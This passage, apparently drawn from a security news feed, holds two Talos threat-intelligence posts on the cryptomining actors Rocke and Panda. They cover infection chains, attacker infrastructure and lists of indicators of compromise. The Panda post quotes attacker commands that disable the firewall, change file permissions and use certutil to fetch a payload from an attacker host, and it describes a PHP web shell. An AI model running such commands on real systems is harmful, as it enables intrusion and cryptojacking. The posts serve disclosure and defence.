that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors. \n \n\n\n## Introduction\n\n \nTalos has written widely about the issue of [cryptomining malware](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1535643040325000>) and how organizations should [protect systems](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html&sa=D&ust=1535643040326000>) against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as \"Rocke\" came to our attention. \n \nRocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. \n \n\n\n## Early campaigns\n\n \nThis threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. \n \nSeveral files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999.\" Subsequently, the Gitee user page transitioned to \"c-888.\" Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18.\" \n \nThe repositories on both Gitee and GitLab were identical. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. \n \nOnce the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space.\" This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java.\" The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if \"h32\" or \"h64\" is used to invoke \"java.\" \n \nAlthough we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform. \n \n\n\n## Recent campaign\n\n \nIn late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor. \n \nWe observed a wget request from our Struts2 honeypot for a file named \"0720.bin\" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting \"0720.bin\" along with 10 additional files: \"3307.bin,\" \"a7,\" \"bashf,\" \"bashg,\" \"config.json,\" \"lowerv2.sh,\" \"pools.txt,\" \"r88.sh,\" \"rootv2.sh\" and \"TermsHost.exe.\" We set about examining these files. \n \n \n[](<https://3.bp.blogspot.com/-Wv1QkpgsIM0/W4gFUMGqKFI/AAAAAAAAAx4/evI36ADu_wE3nWnR38WNm6I2gitFSIngwCLcBGAs/s1600/image5.png>) \n--- \nScreenshot of HFS system \n \n \n \n \nWe had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. \n \nBoth \"0720.bin\" and \"3307.bin\" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that [Morpheus Labs](<https://morphuslabs.com/criminals-dont-read-instructions-or-use-strong-passwords-a09439617867&sa=D&ust=1535643040331000>) described, the hard-coded password was not only identical, but also located at the same offset. \n \n[](<https://3.bp.blogspot.com/-gkkEgex3fQE/W4gFfUPyS7I/AAAAAAAAAx8/FIip4n1BydgCUlwQQoEJKmNlfvJ3ShivQCLcBGAs/s1600/image3.png>) \n--- \nHard-coded password \n \n \n \n\"A7\" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as \"cranberry,\" \"yam,\" or \"kworker\"), as well as mining in general (such as \"minerd\" and \"cryptonight\"). It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called [\"libprocesshider,\"](<https://github.com/gianlucaborello/libprocesshider&sa=D&ust=1535643040332000>) which hides a file called \"x7\" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading \"a7\" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it. \n \n[](<https://3.bp.blogspot.com/-kHdZB-4kmko/W4gF3DsxTGI/AAAAAAAAAyE/hYEz3KrdFgIkb7EvjWOa_-K-iwZvnGmzACLcBGAs/s1600/image4.png>) \n--- \nExtract of Source Code of \"a7\" \n \n \n \n \n\"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor \"Rocke\" (note that for MinerGate, an email can be used in place of a Monero wallet number \u2014 it's simply the login email for the MinerGate platform). \"Pools.txt\" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first. \n \n\"Bashf\" is a variant of XMR-stak while \"bashg\" is a variant of XMRig. \n \n \n \n\"Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. \n \n\"R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh.\" \n \n\"TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the [Monero Silent Miner](<https://xmrminer.net/faq.php&sa=D&ust=1535643040335000>). This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls.\" The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. \n \nThe payload appears to be similar to one used by the Iron Cybercrime Group, as [reported](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>) by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group. \n \n\n\n## The actor\n\n \nThrough Rocke's MinerGate Monero wallet email [rocke@live.cn](<mailto:rocke@live.cn>), we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a[ leak](<http://www.moonsec.com/post-467.html&sa=D&ust=1535643040337000>) of user information from the Chinese security site FreeBuf that showed that a user named \"rocke\" was associated with the email [jxci@vip.qq.com](<mailto:jxci@vip.qq.com>). This suggested that they were one in the same. [4] \n \nRocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language. \n \nThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the \"jx\" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province. \n \n\n\n### The GitHub\n\n \nWe identified a [GitHub page](<https://github.com/rocke&sa=D&ust=1535643040338000>) apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one [repository folder](<https://github.com/rocke/rocke.github.io/tree/master/sample&sa=D&ust=1535643040339000>), we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner. \n \n\n\n[](<https://2.bp.blogspot.com/-SNtJa5UiPK4/W4gGCqRKeUI/AAAAAAAAAyI/5Q6jWCI6uS45BK8w0iehPGTNISfSnZIMQCLcBGAs/s1600/image2.png>)\n\n \n \nWe found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May. \n \nWe also found an [additional repository](<https://github.com/gosrs&sa=D&ust=1535643040339000>) through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it. \n \nThe files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads. \n \n\n\n[](<https://3.bp.blogspot.com/-RfGQEzxzT8U/W4gGOJCNnWI/AAAAAAAAAyQ/9LUooe3vkT4oisVEs5G9zakzcxEqLdirQCLcBGAs/s1600/image6.png>)\n\n \n \n\n\n[](<https://4.bp.blogspot.com/--PZgS5QMD4c/W4gGVIWDJxI/AAAAAAAAAyY/5HcEvufCv5UrUxV5E-F9btlI7knaiWH1QCLcBGAs/s1600/image1.png>)\n\n \n \nOne of the JavaScript files in the repository, named \"command.js,\" uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file \"dDNLQrsBUE.url\" dropped by \"TermsHost.exe.\" \n \nRocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers. \n \n\n\n## Conclusion\n\n \nBased on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates. \n \nDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals. \n \n\n\n## IOCs:\n\n \n \n\n\n### Earlier campaign:\n\n \n \n\n\n#### Attacking IPs targeting Struts:\n\n \n \n52[.]167[.]219[.]168: Attacking IP using repo at gitlab \n120[.]55[.]226[.]24: Attacking IP using repo at gitee \n \n\n\n#### Attacking IP targeting WebLogic:\n\n \n \n27[.]193[.]180[.]224 \n \n\n\n#### Attacking IPs targeting ColdFusion:\n\n \n \n112[.]226[.]250[.]77 \n27[.]210[.]170[.]197 \n112[.]226[.]74[.]162 \n \n\n\n#### Domains\n\n \n3389[.]space \n \n\n\n#### URLs\n\n \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h32 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/h64 \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/x \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/run \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/upd \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h64 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/a \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/run \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64 \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/h32 \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64 \nhxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz \nhxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg \nhxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg \n \n\n\n#### Hashes:\n\n \nLogo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \na: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb \ncron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe \ndir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027 \nh32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 \nh64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf \n \nlogo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b \n \nlogo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a \n \nrun: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5 \nupd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b \nx (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5 \nx86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612 \n \n\n\n### More recent campaign:\n\n \n \n\n\n#### IPs\n\n \n123[.]249[.]9[.]149: Issues get request for 0720.bin \n118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn \n \n\n\n#### Domains:\n\n \nsydwzl[.]cn \nblockbitcoin[.]com: Reached out to by Install.exe \ndazqc4f140wtl[.]cloudfront[.]net: file server \n3g2upl4pq6kufc4m[.]tk: file server \nd3goboxon32grk2l[.]tk: file server \nenjoytopic[.]tk: file server \nrealtimenews[.]tk: file server \n8282[.]space: older C2 \n \n\n\n#### Domains registered to Rocke (not all are necessarily malicious):\n\n \n \n5-xun[.]com \n88180585[.]com \nfirstomato[.]com \njxtiewei[.]com \nncyypx[.]net \n \n\n\n#### URLs\n\n \nhxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe \nhxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=12275&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com \nhxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books \n \n\n\n#### Hashes\n\n \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin \n38066751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin \n89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe \nd341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7 \n442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf \n7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg \n7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh \n2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt \nba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json \n7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh \nd44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh \n35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe \n654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO \nF808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY \n725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct \nd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png \nece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png \n \n \n", "modified": "2018-08-31T17:22:22", "published": "2018-08-30T08:26:00", "id": "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/e2oaIaRaI6k/rocke-champion-of-monero-miners.html", "type": "talosblog", "title": "Rocke: The Champion of Monero Miners", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-17T15:28:34", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. 